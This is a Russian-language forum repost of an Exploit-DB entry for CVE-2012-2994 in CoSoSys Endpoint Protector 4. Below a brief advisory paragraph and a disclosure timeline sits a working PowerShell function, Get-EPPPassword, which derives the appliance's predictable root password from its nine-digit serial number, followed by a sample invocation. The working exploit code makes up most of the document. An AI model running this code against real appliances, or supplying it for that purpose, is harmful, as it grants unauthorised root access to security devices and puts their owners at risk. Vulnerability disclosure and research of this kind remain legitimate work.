Exploit CoSoSys Endpoint Protector - Predictable Password Generation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
37803
Проверка EDB
  1. Пройдено
Автор
CHRISTOPHER CAMPBELL
Тип уязвимости
REMOTE
Платформа
HARDWARE
CVE
cve-2012-2994
Дата публикации
2012-09-17
CoSoSys Endpoint Protector - Predictable Password Generation
Код:
source: https://www.securityfocus.com/bid/55570/info

CoSoSys Endpoint Protector is prone to an insecure password generation vulnerability.

Successfully exploiting this issue may allow an attacker to guess generated passwords and gain access to affected appliances.

CoSoSys Endpoint Protector 4 is vulnerable; other versions may also be affected. 

function Get-EPPPassword {
<#
.Synopsis

 Get-EPPPassword calculates the predictable root password for Cososys Endpoint Protector 4 servers.
 Author: Chris Campbell (@obscuresec)
 License: BSD 3-Clause
 
.Description

 Get-EPPPassword Timeline: 
  discovered            3 Mar 2012
  reported to vendor   12 Jun 2012
  reported to US-CERT  15 Jul 2012
  released             17 Sep 2012
    
.Example

 Get-EPPPassword -Serial 123456789

.Link

 http://obscuresecurity.blogspot.com/2012/09/cososys-predicable-password-cve-2012.html
#>

Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Serial)

#function to calculate sums from serial number 
function GetSerialSum {
 if ($Serial.Length -ne 9) {
        Return "EPP Serial Number is 9 digits"
    } 
    else {
 #convert $serial to an array of integers 
  [int[]] $SerialArray = [char[]]$Serial| ForEach-Object {[int]"$_"}
   }
 foreach ($Number in $SerialArray) {
            $Sum += $Number
            }
 Write-Output $Sum
}

#function to calculate epproot password
function GetPassword {
 Write-Output "eroot!00$Sums`RO"
 }
$Sums = GetSerialSum
GetPassword
}

Get-EPPPassword -Serial 135792468
 
Источник
www.exploit-db.com

Похожие темы